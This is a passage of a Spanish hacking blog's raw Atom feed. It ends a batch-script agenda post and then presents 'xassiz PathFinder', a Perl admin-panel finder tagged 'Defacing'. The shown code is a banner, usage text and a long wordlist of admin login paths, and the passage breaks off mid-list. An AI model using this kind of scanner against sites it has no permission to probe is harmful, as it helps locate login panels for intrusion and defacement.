/&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;echo&lt;/span&gt;&lt;/a&gt;:&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/set.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;set&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(68, 136, 68);"&gt;"tarea&lt;/span&gt;="&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/set.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;set&lt;/span&gt;&lt;/a&gt;/p "tarea=- Tarea: "&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/if.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;if&lt;/span&gt;&lt;/a&gt; &lt;a href="http://www.ss64.com/nt/not.html"&gt;&lt;span style="color: rgb(0, 0, 0); font-weight: bold;"&gt;not&lt;/span&gt;&lt;/a&gt; &lt;a href="http://www.ss64.com/nt/defined.html"&gt;&lt;span style="color: rgb(0, 0, 0); font-weight: bold;"&gt;defined&lt;/span&gt;&lt;/a&gt; tarea &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;a href="http://www.ss64.com/nt/goto.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;goto&lt;/span&gt;&lt;/a&gt;:Add&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;for&lt;/span&gt;&lt;/a&gt; &lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;y &lt;a href="http://www.ss64.com/nt/in.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;in&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;"fecha","tarea"&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/do.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;do&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;for&lt;/span&gt;&lt;/a&gt; &lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;z &lt;a href="http://www.ss64.com/nt/in.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;in&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;"^","&amp;amp;","&lt;","&gt;","|"&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/do.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;do&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;a href="http://www.ss64.com/nt/set.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;set&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(68, 136, 68);"&gt;"&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;~y&lt;/span&gt;=!&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;~y:&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;~z=^&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;~z!"&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;echo&lt;/span&gt;&lt;/a&gt;:::AGENDA::&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%&lt;/span&gt;fecha&lt;span style="color: rgb(51, 204, 51);"&gt;%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt; - &lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%&lt;/span&gt;tarea&lt;span style="color: rgb(51, 204, 51);"&gt;%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt; &gt;&gt; &lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%&lt;/span&gt;~&lt;span style="color: rgb(204, 102, 204);"&gt;0&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.ss64.com/nt/goto.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;goto&lt;/span&gt;&lt;/a&gt;:menu&lt;/blockquote&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Saludos!  &lt;/span&gt;&lt;img style="font-family: verdana;" src="http://foro.elhacker.net/Smileys/chef/cool.gif" alt="::)" border="0" /&gt;&lt;span style="font-family: verdana;"&gt; &lt;/span&gt;&lt;img style="font-family: verdana;" src="http://foro.elhacker.net/Smileys/chef/wink.gif" alt=";)" border="0" /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-242621759046408406?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/242621759046408406/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2010/03/batch-agenda-by-xassiz.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/242621759046408406'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/242621759046408406'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2010/03/batch-agenda-by-xassiz.html' title='[Batch] Agenda - by xassiz'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-4535261778445766774</id><published>2009-12-24T15:23:00.000-08:00</published><updated>2009-12-24T15:24:14.361-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Admin Page Finder'/><category scheme='http://www.blogger.com/atom/ns#' term='PathFinder'/><category scheme='http://www.blogger.com/atom/ns#' term='Defacing'/><title type='text'>[Tool] xassiz PathFinder  -  by xassiz</title><content type='html'>&lt;div style="overflow: auto; width: 100%;"&gt;&lt;div align="center"&gt;&lt;span style="color: red;"&gt;&lt;span style="font-family: Verdana;"&gt;&lt;span style="line-height: 1.3em;font-size:100%;" &gt;xassiz PathFinder   -   by xassiz&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://xasscapturas.webcindario.com/Aplicaciones/XPF.jpg" alt="" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Pues simple, un Admin Page Finder en perl &lt;img src="http://foro.elhacker.net/Smileys/navidad/cool.gif" alt="::)" border="0" /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeheader"&gt;Código&lt;/div&gt;&lt;pre class="geshi"&gt;&lt;span style="color: rgb(102, 102, 102); font-style: italic;"&gt;&lt;/span&gt;&lt;/pre&gt;&lt;blockquote&gt;&lt;pre class="geshi"&gt;&lt;span style="color: rgb(102, 102, 102); font-style: italic;"&gt;#!/usr/bin/perl&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0); font-weight: bold;"&gt;use&lt;/span&gt; LWP&lt;span style="color: rgb(51, 153, 51);"&gt;::&lt;/span&gt;&lt;span style="color: rgb(0, 102, 0);"&gt;UserAgent&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(177, 177, 0);"&gt;if&lt;/span&gt; &lt;span style="color: rgb(0, 153, 0);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;!&lt;/span&gt;&lt;span style="color: rgb(0, 0, 255);"&gt;$ARGV&lt;/span&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;[&lt;/span&gt;&lt;span style="color: rgb(204, 102, 204);"&gt;0&lt;/span&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;]&lt;/span&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;)&lt;/span&gt; &lt;span style="color: rgb(0, 153, 0);"&gt;{&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html"&gt;&lt;span style="color: rgb(0, 0, 102);"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;a href="http://perldoc.perl.org/functions/q.html"&gt;&lt;span style="color: rgb(0, 0, 102);"&gt;q&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(0, 153, 0);"&gt;(&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;          xassiz PathFinder&lt;br /&gt;&lt;br /&gt;  db    db d8888b. d88888b&lt;br /&gt;  `8b  d8&lt;span style="color: rgb(255, 0, 0);"&gt;' 88  `8D 88'&lt;/span&gt;    &lt;br /&gt;   `8bd8&lt;span style="color: rgb(255, 0, 0);"&gt;'  88oodD'&lt;/span&gt; 88ooo  &lt;br /&gt;   .dPYb.  &lt;span style="color: rgb(204, 102, 204);"&gt;88&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;~~~&lt;/span&gt;   &lt;span style="color: rgb(204, 102, 204);"&gt;88&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;~~~&lt;/span&gt;  &lt;br /&gt;  .8P  Y8. &lt;span style="color: rgb(204, 102, 204);"&gt;88&lt;/span&gt;      &lt;span style="color: rgb(204, 102, 204);"&gt;88&lt;/span&gt;     &lt;br /&gt;  YP    YP &lt;span style="color: rgb(204, 102, 204);"&gt;88&lt;/span&gt;      YP&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;           &lt;span style="color: rgb(0, 153, 0);"&gt;[&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;+&lt;/span&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;]&lt;/span&gt; Modo de uso&lt;span style="color: rgb(51, 153, 51);"&gt;:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;  perl XPF.pl http&lt;span style="color: rgb(51, 153, 51);"&gt;://&lt;/span&gt;www.target.com&lt;br /&gt;&lt;br /&gt;    &lt;span style="color: rgb(51, 153, 51);"&gt;-------------------------------&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;            Coded by xassiz&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;)&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/exit.html"&gt;&lt;span style="color: rgb(0, 0, 102);"&gt;exit&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(204, 102, 204);"&gt;1&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html"&gt;&lt;span style="color: rgb(0, 0, 102);"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;a href="http://perldoc.perl.org/functions/q.html"&gt;&lt;span style="color: rgb(0, 0, 102);"&gt;q&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(0, 153, 0);"&gt;(&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  db    db d8888b. d88888b&lt;br /&gt;  `8b  d8&lt;span style="color: rgb(255, 0, 0);"&gt;' 88  `8D 88'&lt;/span&gt;    &lt;br /&gt;   `8bd8&lt;span style="color: rgb(255, 0, 0);"&gt;'  88oodD'&lt;/span&gt; 88ooo  &lt;br /&gt;   .dPYb.  &lt;span style="color: rgb(204, 102, 204);"&gt;88&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;~~~&lt;/span&gt;   &lt;span style="color: rgb(204, 102, 204);"&gt;88&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;~~~&lt;/span&gt;  &lt;br /&gt;  .8P  Y8. &lt;span style="color: rgb(204, 102, 204);"&gt;88&lt;/span&gt;      &lt;span style="color: rgb(204, 102, 204);"&gt;88&lt;/span&gt;     &lt;br /&gt;  YP    YP &lt;span style="color: rgb(204, 102, 204);"&gt;88&lt;/span&gt;      YP&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;)&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 255);"&gt;$target&lt;/span&gt; &lt;span style="color: rgb(51, 153, 51);"&gt;=&lt;/span&gt; &lt;span style="color: rgb(0, 0, 255);"&gt;$ARGV&lt;/span&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;[&lt;/span&gt;&lt;span style="color: rgb(204, 102, 204);"&gt;0&lt;/span&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;]&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html"&gt;&lt;span style="color: rgb(0, 0, 102);"&gt;print&lt;/span&gt;&lt;/a&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;"&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;\n&lt;/span&gt; [?] Analizando: $target &lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;)&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 255);"&gt;@paneles&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;=&lt;/span&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'ADMIN/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'paneldecontrol/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'login/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'adm/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'cms/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admon/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'ADMON/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administrador/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administrator/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admin/login.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'ADMIN/login.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admin/home.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admin/controlpanel.html'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admin/controlpanel.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admin.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admin.html'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admin/cp.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admin/cp.html'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'cp.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'cp.html'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'controlpanel/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'panelc/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administrator/index.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administrator/login.html'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administrator/login.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administrator/account.html'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administrator/account.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administrator.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administrator.html'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'login.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'login.html'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'modelsearch/login.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'moderator.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'moderator.html'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'moderator/login.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'moderator/login.html'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'moderator/admin.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'moderator/admin.html'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'moderator/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'account.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'account.html'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'controlpanel/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admin/index.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admin/login.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admin/home.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admin/controlpanel.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admin.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admin/cp.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'cp.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administrator/index.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administrator/login.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administrator/account.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administrator.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'login.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'modelsearch/login.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'moderator.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'moderator/login.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'moderator/admin.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'account.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'controlpanel.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'admincontrol.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'adminpanel.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'fileadmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'fileadmin.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'fileadmin.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'fileadmin.html'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administration/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administration.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administration.html'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'sysadmin.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'sysadmin.html'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'phpmyadmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'myadmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'sysadmin.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'sysadmin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'ur-admin.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'ur-admin.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'ur-admin.html'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'ur-admin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'Server.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'Server.html'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'Server.asp'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'Server/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'wp-admin/'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administr8.php'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;'administr8.html'&lt;/span&gt;&lt;span style="color: rgb(51, 153, 51);"&gt;,&lt;/span&gt;&lt;br /&gt;&lt;span style="color: 